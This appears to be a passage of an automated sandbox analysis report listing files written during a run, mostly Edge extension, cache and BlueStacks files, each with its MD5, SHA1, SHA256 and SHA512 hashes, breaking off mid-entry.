C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\manifest.json

MD5 36c7c3d8f8d37e17ee06d7a4ce3099d0
SHA1 ea7a3d54e78ddbb80a05888412b2f079a75e5b7f
SHA256 1b594fb15c701e51f960bbb9efdfa72198cb3b6c3aa122ad759524e2c82a2142
SHA512 990a66fa225c7f63804a5c0ca9d4d1af87bff0c1ddf55cce2557d14ebfb17f8639dca12f544fc2c5b218723622fb1be6f7779d5ce8755a562957e5361d6fc9c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\index.html

MD5 336fd61de62addda84cc9e5c283b7e67
SHA1 6b5985b920c40c61fb320f70be5f89233754699c
SHA256 6476c7b35152cbbe4906e94dada4e68faf052744cb0da74589679b86d49edd15
SHA512 2f641a563c6283ee3582c597c10be2336a18cf5e4a1e0c1a3c8b661e1ef49774145f15630b90cb5c1f9bd9439c6d64dc2bfc160763ae3d949eb0eca805bfbad6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\index.bundle.js

MD5 21a57bcfd8166f1a78e93ff075073dad
SHA1 b222925084dcb825c56a1f4d061ce60d73b5e697
SHA256 5fb95e4a8b1ee5fdf974bf4fa3e0890b3d973b98598ced1fd5f4cbfa27e7babb
SHA512 5de66932e9868b16eba364c24052131fa8bad2e097c72bc51f8493b91e8380df4b4717ff97536fb3789a6cffedf198c8b5bfba395572ceadf32fa1eeb130417a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\contentScript.bundle.js

MD5 b5420e42524ff930ce283a078768460e
SHA1 505dbcb230b71985e0b75e1e323ebffe3b15f295
SHA256 a5d2108a9097c9f3fa821b3b90d79c5e4824f74ca21a18c5ff7271b05fda83c5
SHA512 3e8df8ad43c6dc59fa551719057f631d197402d7009b09be898454f28e56378c8539994a22c6141ea527f37549554dfe74e3169eb989d21e9ceb0637d22f61a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\background.bundle.js

MD5 a0f181524d2f89830b233309e578191b
SHA1 5112f2f12100b01f242b0690a3aaf5f7e729cd9f
SHA256 727de56a3efb2b77feda4ac895cd5ab0e7f24b28ebec029b0b3460ffd5912eaa
SHA512 f4324039feb00e2109372a40927d69aa2f739d2dc8383f929689c510fc1a14bff653fe179810daa5d2a4c5518c846020ce8fdfdba403e400535a49f6976b8c59

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\Partitions\plan-picker_5.31.8\58b5e9eb-bfb7-4108-98d3-df638945b53d.tmp

MD5 d11dedf80b85d8d9be3fec6bb292f64b
SHA1 aab8783454819cd66ddf7871e887abdba138aef3
SHA256 8029940de92ae596278912bbbd6387d65f4e849d3c136287a1233f525d189c67
SHA512 6b7ec1ca5189124e0d136f561ca7f12a4653633e2d9452d290e658dfe545acf6600cc9496794757a43f95c91705e9549ef681d4cc9e035738b03a18bdc2e25f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 29508b7fe0811aeb591bb251093d2ef8
SHA1 19019a4cb334dccf40af7468a6b4b90a7eb0dbac
SHA256 81e5fef95a2a7aa833ce8dad4fefcf6c393642a93c2d6b50e0f7c6d37883efe8
SHA512 22455e95d92e0bc0833c5bba0f31ae4c2245a81a7f287944d8d7d50e27d0ef3eb9d63dfdc185e69b251d4ce86c74c4547db1fd9311562be7aa93292c3f0b2b49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 783a2c31d471b550829cf90bbf9c7ecc
SHA1 798a7c230774bd6f832e2e4824ab3dc78833cf03
SHA256 8661d698336660b49f0ae1e7bf4c02ba4ea7e71b93e5c44f1d237872e3acd800
SHA512 f67f0056a6713c3a00ff0c1b3aebf0e32f6f1331cea62ff1ff44df87c000de1254a298639d944d6680acd53165a3f78ddb116ed88b16ff55331f6043f81db1db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 9e02c9fdebc3f14b7e5fb104c6866866
SHA1 41dfadafa80ce5d7a56e9fda981b169fc85e2b6d
SHA256 8436cb721a8050dc060e95322bd00c204108bb7825b2187c21b39803b37ac23b
SHA512 2f16fe415068b33581d9bfe8a1f384935598a0b7ef9113122e80a1b69d47eaffb758df78176e55792576c123fbc23caaf4d862e1ec68bf91f7fbb2b06e62885f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00019b

MD5 2b13134307db26e78db56c8bbb46f268
SHA1 f0cc0f0fba9f504a292d50f9a461b0914c7098f7
SHA256 464ac74315ff61e909565252ee0f9bff77125cc7595d9a946ed758a0388e5c12
SHA512 e52d753264eb6c4aaed7208c4aaf683ff26d96961012c6d78c69b93f5f9d0f1fe3a8f067950456aaaf5c4f80596870740e64bb7005b98fbbe23570b25c1377c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9876fa783d3f3d176abbbea3523fab9d
SHA1 ba3634f67ef392b547072f5836cd838588e2abbb
SHA256 2f4464f9e4bdd33ee4e8a8eefb47e9d2231214f798d416c93340c1afd837c4f0
SHA512 2c1254d94c7d451ef90bc56f1d8a3066b99537558a815f75640dcf6fecedb47b77c00f9852da0d77e9c3ab8ee0ff814dcd6131900d2eb139a83b25c0530a1ed5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c8658a5e66d47954a536af972fa60895
SHA1 cbbc895eb21eb94c34854dc524cc7e821407d537
SHA256 0258557185cee765653d58dcbbd1153cdfef691296b94ff04f0564ae1924386f
SHA512 01ac7ee622f1f8a0d47e240b3998e508ab9fd6ebb4196c17a7d6ed79420ae5b25203e4ec67e3418220a8f4691e3e65dc7aac78f0d4a7159d76cc50c1f98a7f86

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\Partitions\plan-picker_5.31.8\Network\Network Persistent State

MD5 98d19540e7a6b445aeed6d40a6239ea2
SHA1 423bc1d0c2cfed5cd8e157ebe0c903690630ee0a
SHA256 1cdbf693254fe6abf51eee605101928c5ce36a494d85236d088f71dd4fb88b3b
SHA512 094e864c6eba0ab002b7d6e6fa59de58ea28809047c56345fc6a628a4be6d19184871c743b74106dcc56c3db70d81f2af2892ed3f162d0c59553c2affc7b539f

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\Network\Network Persistent State

MD5 f0d17d8c1caf1143f88fbf9f82969c84
SHA1 7f89d74c1f1972815bbd1508cad2f3a46fd6d948
SHA256 44ea00eaed6329efdc7a01c4216c8252b20c25c2fa1ab41ea5e58b0b89a1c550
SHA512 105f0aa0d801b2c706d0a2ea7db14e91966bda9b150555d0a16d51a848d3dfa71be6559434d8967f3d8f1adb699d93a1f60eed9ac57372e7cc166e8ad82af279

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c524f07670651b80_0

MD5 98dad017dd2794322bdb080333b7b955
SHA1 8325723f77033069ef521a765a61e3a8d10f94f4
SHA256 2cf44bbeee2fdae39e3deac1aa60847ea26362706b267f688c6a789ddf07418c
SHA512 cd177e133c2d21f9ba03643b5337b14622e4392e61d5b46cc183f47774865addcf30c432cd599c127d83c1447dda9e5db60dfbb664cbed60cbcef4a28ab6ef81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\475f283cd4e91407_0

MD5 381a47ab826ca68d5b13eab5d1a7e46c
SHA1 f22f079a97775b5d0db3f9ff469b263d7d43dcb2
SHA256 052593a5ce1b375d6e61f26cf01334f0c18184b73ab9a963bfa62b45918aea36
SHA512 f3b425f2cf8dc6d98b53f5bdc4a79f6faabfa85219f9df192ee1e964c5c183d82637f3a5d113060006ede69f6c1fc8731b0c18d4c241584af260e26b80dc98db

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\ioSpecial.ini

MD5 5292b076bd44e3090910989c0f0f9ddd
SHA1 3f1630bed4eb59973542b958ed63f5e5abede1a5
SHA256 082d8d1264d5e7add9d6acc4be373ff48d47fb3c8a259bd818223e35639b6784
SHA512 1cddd0bee5e10b3c998b09b9b61f5ecb2d40f7c09fbaaffc75a41ab125dda8184e3490a37dec4475467a405580eaa6e33d2f505a8e1e53a8251c5e354cc1e606

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallOptions.dll

MD5 8d5a5529462a9ba1ac068ee0502578c7
SHA1 875e651e302ce0bfc8893f341cf19171fee25ea5
SHA256 e625dcd0188594b1289891b64debddeb5159aca182b83a12675427b320bf7790
SHA512 101da2c33f47bd85b8934318e0f0b72f820afc928a2a21e2c7823875e3a0e830f7c67f42b4c2f30596eaa073617790c89700c0d95b7949ec617e52800b61d462

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0001ac

MD5 8317c1878582f962946ac1cae3fdcbfc
SHA1 aabc45d812a41e5983dbc08ce6f619c7408dcade
SHA256 cb36ed02c83b2b633d275cf5d551d1961ba5f768ef83c113fb1d0d00820fcca6
SHA512 b19b3da449e42f9973fea83257436ff985bb71487a86fa2a31569a958a6ad38777b7644c65cdd106cd5d53c178a6485198ee929f357aaff956174ee7f2e57a0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0d03511293b6a8b7519a5d6c209ca0a7
SHA1 5d8b00452ee4f348c730f29fcec4fea108be1d66
SHA256 ff22f5ef0aaf7d38795dcf622b919e626d55776756e7b237889f5100aa261043
SHA512 7f237197b0854c5488855d4c05c22a7562e435f75ec344823653bd1a867a871656cd649e583900fd6e19ab8efd4b1e030580d096b4606efef98f3c31304e8e8f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 43fb5c26708bf0193e8adddf3b2f24ac
SHA1 956b0489486161de762d1d604e0b69a40d2161a7
SHA256 8df7877df89fb4f003ba2a47a79ba517e9f20b81573f89de1165e22d2dabaf53
SHA512 2e9c81c26f025c68122927d622b7bed730ab6dfd79077e01ceed7cfc4a45a3ecc08482c507c71cfa09189018104c60d8446e1d37828a7dee74f26771509abb32

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e8f6640eef188435_0

MD5 ad1d2f6762a61674f263b620e99cd011
SHA1 01a99cc456ff4639e74d9176dc394e4a3761622c
SHA256 3dc293749ec021eee794c10970eb5cb59fdf8b394ad5c5b1937e44feb5e08c8d
SHA512 fd2c5712f63156a4d6fc3489ce4dea320cea34fd07ba9796da45e59699cc5c5f239446011c46c4eba3443beab9b2f5a3b1c4fcf523d443d1756e87f4b38951a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0001f6

MD5 f0f849b5e2599abf2a1a6ed1d312108f
SHA1 5e823d0fc74d5aac82a052712a2cddcef32db30a
SHA256 68f0d55dabac126829fd3a8df2ad2605641aa82b9ba8ec4551e2f709091d7bb8
SHA512 dade202b5bf721b3b62e4e1bfb81ca8dd6f629d7dc08c27a308e693c07728d043962f750a812c1b520f0035959429f899e08ecddb978bff8b4eebb9e8a1ce9d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7cf9843337c39c04_0

MD5 b3e9c20d534a41d5df6dc2abd6155737
SHA1 75728f090c1b3e47ce6ef197d90d5e7eba56c7ad
SHA256 7225130887d37d184c7d27afc71e728c9f14e1214c5bcbf75ff7c04d08db8986
SHA512 a59cdd2fe98e837fb305399a334d3549a1b94e4c01ca8a43c514af7c69c9f34d7e52292216436c4d731d22e82360d46b91b0472e0108c4c5124d6acb3d38f0ae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a37ad9a49149528a_0

MD5 b066e14b8785d11f9d9865d687894502
SHA1 7025f62273d6df43cbf40dd5789b3ac1ef9cc113
SHA256 8539885286565e380a137568149ea162b1d72db7522900dec848ba5942bb99a7
SHA512 3acbb54abb7630a8f838f9a11b997ab67beb4255f33d3a31b4eae7ca4b4e9b37f19842a09b5b11c75c77a8e58dd13d852750686f722bf171ed1f91fe43f667fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ca5bb3c84b908d6e_0

MD5 4ad0a6e35a2eb6be6a410963ac0747af
SHA1 850b15475e07f87091a00672f22c2a501acfc5c3
SHA256 0ca8e034a2a9e447a8241e30afeac9fd021153c012019b2a9fad337cd111cdcd
SHA512 bd68cd15f73abd841657861f4388d3e02d7bbd82313e6279abbfb2daa4cd9d0aed663397fc4616d3104cbd6bcf065b91536fbc435be1775c2c7ebc87824b5c4c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\59fc8adf66a76ab9_0

MD5 d89d662041684492cf76398940627cc6
SHA1 ed41da4f3004aa8797deaa16817237aab31c7a8a
SHA256 55ef9263d5b0424d4419fb5c539333ed3c96c484e9a898124344be21f54d9a83
SHA512 7d6bcf7f73b58e861ceac89fbd8ebcaeb5e9fddcb8774dcdbb237c64fba0c6209a56399ee6622269ea2b5b4133be1a79259bdb479a9b853ef3ccae3d7372a567

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\718aba49c9504085_0

MD5 8a634fb958e7ab84f6fb72cc946e480d
SHA1 640e8a62bbba82c9ec3bc41d294dec5918974b41
SHA256 9a62f4f9376b1ac49b49a0a664baa1ae9a5dd81060c94f306a36ba76ea5e0e2b
SHA512 958f214d228b5441f7e0e5a2295c3265fcccc1cc03e1ab1b89b7783ec4a8925ed561bc62667a196077b9b063caba00cad074650942b23a749993f4defc6ec767

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\99110e9a19c3c06d_0

MD5 7cd88469bc8e59ce8c2af4593354e186
SHA1 911ff7950702156f9098aa15a3a1b7bc4ca39f80
SHA256 88c16b75b91e4b9b21b61b6bee5c5a6430df7989e3d25d25da00ace54dda12e1
SHA512 b1c6dc181b04661584081a8a47a4a312e0c3b0ab870e91aa16f777f9ccabeeb71c808f3480429863b6c43ab6a523098aec23ac6fd0e165f02d96846e678f734f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5801d3329fb36c59_0

MD5 5a2914efdaa3d49efbff55f099ddd1d5
SHA1 57e686498098572903c5ddc4b5d554043e4e8c17
SHA256 9769363b026d2011465a1fd6b5bf921f7da1e7cc4904547b5dbc157664ac10e8
SHA512 e74cee917f3f85137f9a367e507ae1088774242068cdcda565cb10c4923913be0c145d09c7a918acf0c2fdbab3b722e051fba44fcaa399983d2a805759205fa8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\94f93ada55bda7c3_0

MD5 1162963b4af6752cae80bcd5efee8b45
SHA1 62753fd798e234690043b293a9eb4413e658867f
SHA256 fc5d37e999c6e72e2dd11d7b0a7718b9ea7b7adbcdc07340082f31b7535e5e21
SHA512 7c83883734454f64cc01d3a2767ff8987a6fba4a1dc29d0b4ae8acef3c7b03c6847c9d352e70f56142702cc3e636b926db2e2cbe6a05b0b7004029b8d883ce94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e3d18be5d494e38e_0

MD5 a7d5d8b960adac0ea29634339ddbf879
SHA1 3ead2300fb9be3e949117b302dbb3b2a43301ab1
SHA256 f547f9878feebc3b01c8be07b6737e429aca65d1453f546ba7d5a4dc02d8762e
SHA512 220bc61557523d7b0e5f482d63bb7fb4af99c24d935f9543c2976e4d99272ea57a62030699f005b76b4aa87ae1852b590313fbb8167897569f6b0957d0e2a066

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\960f838b42b585c9_0

MD5 b834c88371b7a0c9a87965bc24571236
SHA1 fe894658ac78b352ef1ee564b8775a0bc5a728ae
SHA256 e656dbadb38d6a955648a381fed5abfe9e2df09f811f603bd766e19e55eed7a9
SHA512 6d973da0cda58d80d3496106144ea06a5c20b0f68016d34f38298f4899302d1d208bf39ef0c7cb14d58bd9687640f42c52e0fd77d9e404d54dc9596f2ad2d777

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6b462fc8990cd7fd_0

MD5 a656f69eaf04c0d058324d1094b43336
SHA1 62c67768162414c7f6a6ac7facfccf0cfb2fe72f
SHA256 37c8513ead3fba3b31f68c69905b7955f0eb06703c79ccc4b54fc3546d4799d6
SHA512 cc464e1aaaceadcec251d0085778a60726cecbdf24bb25a9d4e0b125b854123aff67b63eb9cddf29a8dce00c3b04f95b13e4757887e900e2de524bd4a9f3472c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\718cc3a9e092869d_0

MD5 b04a8f7d31f2d533aadb7e49b86e9ce5
SHA1 a661dca9b2a749d3ecadb47b938b49b458aae545
SHA256 0dd0bb702573b052297ff40156e299029b357c461a0c08b860becaa8065b78a1
SHA512 410c8c2b9e308963976050ef6b5c242abfbb022c4e6fada34c69d6f8492811e2a625d133a3a49999b5f2bc3df1cbc4df897967c8e7c92bb816789a24dda7fb52

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c33a7b2cb137686b307b16640281d800
SHA1 2777feadefabb5b4cc2fa0abf58889018c202362
SHA256 5a95f199e7f67172989263e5ef132c47fcb482b1cd7d09a6035ac9b5299e1832
SHA512 c553cd951d70c4d896185dee105dc1696d7e7752ca24123ccd1cc2b779aa4860ee29007b074de7af28d8e985d7dbe8ab552c1662e3253366d0689918eb38e334

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000219

MD5 d453eca18d366c4054d2efd57717cf9d
SHA1 c7b0dfc73bb89d8f0a94e2cde0eeba2b5e07d5c4
SHA256 be8f4fac2d40747a0adaecc6f1befe81b254a2b12bf25ce01d7194b374a457fc
SHA512 a6f770c9e4058e8c17f3f72a245f76075441e07507ef05d455108e1768ca2a93f851b92335b33c1de61cf941cf135b0be4698d3d551b54132b2d5c882fd34835

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 37e8f24527344e4488f710ea58a00704
SHA1 761f7edbbbf42bf1227c4d29019576968f56d1f7
SHA256 3f5f07249b00598254a4a544738551b37b164116df0c7d77d545a99d18b34b11
SHA512 017a2e404325a5a2b7ae52343f0e5d2c3579de5cf72c5947622c7e2eda33459032cca6a5d7971732e8f091957303d246ba22e15f6c66e887c01462b1f1326b7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7e4741b96acd0063c1fa75d5f7a298899cd19792\30cfdc05-8b8b-45d0-8259-4e81a9a0aa62\index-dir\the-real-index

MD5 1b535ae8866efb933aa48e0233a31a3c
SHA1 6723b6f4dd224bf71b1c8887c2e7a891df50d8f4
SHA256 9a71a3cc1e0200de1f120b62016fc42d93dab154667eefb7150bce1d500362f2
SHA512 679da6f3ec0600a96a5a9e5ff72e2c2bc05eaeebf075fd8bc99a66034863e743063bd1e5cc102c29b441115731e9c8b5b893770a0a1474be46b9589a57f274bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7e4741b96acd0063c1fa75d5f7a298899cd19792\index.txt

MD5 affb27c89e51f92a0902cde53d7c4d4a
SHA1 d993c45b322893764dc0bc088fda52b4f1f8eb73
SHA256 54abfebeb21a3a1703d36c0931abd003da7fbfe1f92ab063bf068ec774b0a63d
SHA512 dca9d03c5296445997ce4a251d25b71a9166aab74c6ec901cec58c222ae5a894b98f27a56feec2b32f3b2292e8df230fe369889f02ab8cab8eb7b5fbc9a04bad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a1943ee6-8a2b-4577-b125-b13aa177f006.tmp

MD5 597066587ca7f738a6505f595f5f2988
SHA1 261ce1248cfe7ed86e97b488ed25c6e5e1399cf4
SHA256 94c240149f4162c7d97b3862f0e7bf1df0ef1e15fa9718a5d3c764441ee11f59
SHA512 75ed5cb663c3a7d5c469e9b9976fc91465c95f914c3774dd05a76a7cadd1a5f5274ad9dd7f834ed0e7080930c6c30f0e6581932a038c59b37ec7a72d4c0748cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a1b60dfd09ef0027e9396a72a6399266
SHA1 11a51c9b3c908095e42934bc5e4d542ad5db9e0b
SHA256 160672bbdb88836c25265cb04edc5eaa9fbd2161fe165c8842214c8068e7c389
SHA512 4cfcae4b8cee18324a3da78741c4727bed104a09902c96bbd40212e6deea359ce6c23c56027028797f93839cb853805158d855ba20de3e8bbeb2627677b8a132

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\944d6242-69c4-4571-975c-8f388925909d.tmp

MD5 a35a696e3139d44e102c609a81debdde
SHA1 579ac6cd347e2b308a4e8e4ef05075f5d4e44119
SHA256 44a1b6f716d84981410e73246124ee1b8ae0ff85eef0764c7351f15e380c4107
SHA512 d9cad6fdcbe0900b2afa50d0a9c127005eb5ecdd98a32627e9242a76fb275f5ce87f6f1ad4ede65187fbbfaff58e8c6bcde4b71b0dd4a830cd558e276aeac3f6

C:\Users\Admin\AppData\Local\BlueStacks X\Log\log.txt

MD5 749faa947fcc999b3eab348f189339a8
SHA1 8879dc3a8d0318f4cb435732fcb330a31d9af493
SHA256 e01890926750b595a58b3e09613ebbc50bbc25c4fef12da399f34d3085e4be6b
SHA512 f120bd799d225de981223de64a745bce493ca6e9b52b207e55b405b011b0998b274353a7f798bd93d3ffe680e927e7e7b77e384a5fad5e2827f4a98d924ce623

C:\Users\Admin\AppData\Local\BlueStacks X\Log\log.txt

MD5 c7190cbf674c963c92b0588344bdca72
SHA1 9f7ecc9e41dffb2cf36b2e98800d1906a8a63dda
SHA256 2f2f4580f2db263f9e9a780fe664a7834d37a196f7090fffd9bb9b7693740b0a
SHA512 b58519178bca83cdc2b14ca58554fb995b8d464aa5d97003f847a14bf23cb4f88807306824ce72ad6734f085975b2a20f5489485dcd55563390232f5d8a2219f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 857a3029657218c40e2a434eb98e4b2c
SHA1 d223e711b01d1f95916bbad8d84129d8360fa58f
SHA256 8d9509ec0a7770a67abf2b3d51e86918b33e67d3ffdd63b0d703fbe23cd60bd0
SHA512 d8449c2727476b6a598130a1af697f628553b142ac62aef4386a4771b9f92d223e4c6a87330199cbc0fcfc85bec362b3da713dd9111d61c0b58c2599175000b6

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_00001f

MD5 7a290835539323b7490fa9c068f4b68f
SHA1 144a903da574868f7475879b8910664a49245720
SHA256 f0e2bc7305210cb2caf477b03bb3d40463b1f51ca9b5684802b407fe9cd3fe51
SHA512 177153ff832fbb887c0d5925884617b93ac09c277d03caeb5f15027dd545e2c85e70d618c770cefb66274bcf0906422ec562afb14724b14bc3df67085e6ff896

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_000020

MD5 5bb5fdc56d18d14419a670dd28b156fb
SHA1 d2158a163926ba9dfde6e82a3bffae916bc980ea
SHA256 4cdd4759cb2702d43deb90edce744504412d4d39a7ec657f7da84df0382abd9a
SHA512 1d4f9e3381a71c886199d2ff300b76d8c8834914693284e09ec3a40160aed4dfa5195ce0d8c953970e148b9fc2c23b5e0a9abea291a13844aece3be1d38efb6f

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_000021

MD5 008568ff49428d51d7f53c8703c947bc
SHA1 443c6629214ccd22df5daf4047763fa103b47336
SHA256 cc959fe449a989b6b3b05160815511f63197eed52d8cf421bb3d531e9f062a1d
SHA512 2cf342e1161eebf13f9ea0c6464b0914b35a3ca8b45ef397c1d6b7f67d73930ece3fd059d2fe3a75c56d12180eddda80ece3e50b2840715b6366fcbefd2c5ed8

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_000024

MD5 762d651b3659b78aaadd643672f395b4
SHA1 475f84a6cb0eda14d196ffae0b05ff224aa25ca1
SHA256 b15960fc83e52326bab2318e7d9966a7e2bb749f909a20ec8c79de9e67136588
SHA512 a3d62d4841571c5d0a89dc9ca17f3080be8a86e83aa059ba7e2c9e3dd57e7b65ea940f3713fb00f82207914a6a390d138c600a7c8f3cb7c3b1066dee297285df

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_000022

MD5 864b95c35a68896755b0bbaa3dfe9da7
SHA1 a7d8360923bf2d4a927ff9581aff67adf0999d8b
SHA256 34fe7ba81d687fbe278d1a2d218e2cfa871b622a2c89d83dd361bff0c29ee39d
SHA512 3c54dab83ebc0d7d0a8be53efc3dccbf8a2c7e8a28f46bcfab1b1a65f54ce7b54680b5d31f8cad2e4efffa23694dec8f37ce11f3101924a0866f8039786ac58c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f68d27f80e47ae4e3c8a79afa40c19f3
SHA1 b2ff9c55628c889269873044ef83a51f6d9188dc
SHA256 851f078e75481eb1458c6197e6433f0bbc906a81256f52b3ede441c0ef1ed352
SHA512 571827283773e7523b08f768169472b91d07b10e177c64d0c88514ed00ab61b372b7ac96630948425f098a12420b26907164c4cfea01576cc935f5f852275fb8

C:\Users\Admin\AppData\Local\BlueStacks X\cache\icons\com.ld.trssjhw

MD5 803027d06e038b92aa1e778becfad70e
SHA1 d030208043f3e74739db2b1ee6b44c8dfe597b71
SHA256 be9b76d3f5629a6eb35d119a635f3a2ed6a5f5420f971139ba14de2a2cec90f5
SHA512 14592f692fd9f9274cf8355bdf495a92ef261dea905551ec18218d3c68ad2e93b6457986da5fca7138251a5bb83eadb846dc48a4edd690d11a11a82517c3a481

C:\Users\Admin\AppData\Local\BlueStacks X\QtWebEngine\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 2892eee3e20e19a9ba77be6913508a54
SHA1 7c4ef82faa28393c739c517d706ac6919a8ffc49
SHA256 4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2
SHA512 b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json

MD5 afe91a14895368572fcae926088e16ca
SHA1 23ad64ef2c7ebd9534be3a0cf748b4b3ecaf367a
SHA256 a3abd6f223443f5bec6efd55bbadbb058747e91679fd296a8633af3dbb536d39
SHA512 12624963064b5d8895132aa499fa7c2f6610c893dbdad7fa403711dd1a73a5e643530b742559a028d919ccd49f3cdf0c17ae1c96347f47be4b9e510634ae16e1

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json.tmp-9718997536b54832

MD5 456ccf27293139531be1bd3ad9d84b82
SHA1 80349df04659ef4e0a1701629d31f9a969057f7d
SHA256 46bcf5fc4bf865d1aa9944856147f6928065369a29d102a16aa044f98f82099d
SHA512 810618152480e4f398d38e4fed7ef568f21bbada70207e382b8feb1baf716d447175755fc10e7d11816c94c71d8328ad104f8eb9dd376979368142dabd88a99d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 49e9e32d88e68325b0a7b37796cde7c5
SHA1 84afa5488636027656a7d0a1813c3e519c5bdecc
SHA256 339f90e00b6ba39c29caa6c46c446886f4ba705c7c93bf62fd4b691b3ea7343b
SHA512 8dec2d0b70e8ad25a2ec353ca8dcb8abb596047a4e914b3485c9ef619b9816f652860260ba530397ac572d88fb537eae77f75f44c52ed95fe7e0af21f5eced06

C:\Users\Admin\AppData\Local\BlueStacks X\QtWebEngine\Default\TransportSecurity

MD5 39146afa9623a1ea7521061b7382ebb1
SHA1 eb165b6405ab82fd78e77a22d0fdb297e533287e
SHA256 590f270cf6865c6d9336a4ad1c1ffcc4493cf02dc78f52fb8689149992070dc3
SHA512 096afb2f64fe103e47b05d66b9f97d384a4bce407d66e9ee45a975407a9f5b34805e97060c3aa367f6814c9d438285fc51e9ac8f81c0d003b4705549729f0765

C:\Users\Admin\AppData\Local\BlueStacks X\cache\QtWebEngine\Default\Cache\f_000056

MD5 b8daab5e3dfa4ce14eeec21987341053
SHA1 4372b8d3e43d8fa892015c6c38921f6dcf510c01
SHA256 402f188eedca43781fc07609737aeadc8f5f96e7512a910dd60270e68df37ff4
SHA512 6bda9765e7b40bfac60c9b4302655480deaf79638b2a170c0b2c70b80c419ffa6b2aa31ae2ff6f62dc219f34d4e22fa775e6137a81b91b5a62758bf57490b97c

C:\Users\Admin\AppData\Local\BlueStacks X\QtWebEngine\Default\TransportSecurity

MD5 8eff0083b158e922af239646d392be69
SHA1 10a07bb53880a11e795fdd114d0205ab3d894c41
SHA256 60428b723f66ca80cb1ff2614856cf02501da6d6154bc65b79f87c17d3fe6696
SHA512 bbe40c382657baf60e16032a3271931b25fbcf7c9a581f56613b042cdb183869530afba8eabba4b60261c80d5258e4b17caeede256392930a66f3581a41532fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b6574151540745002e271dc88841d6eb
SHA1 0f55b2efaa3cd56f991f6f0c33c7e87cda94c736
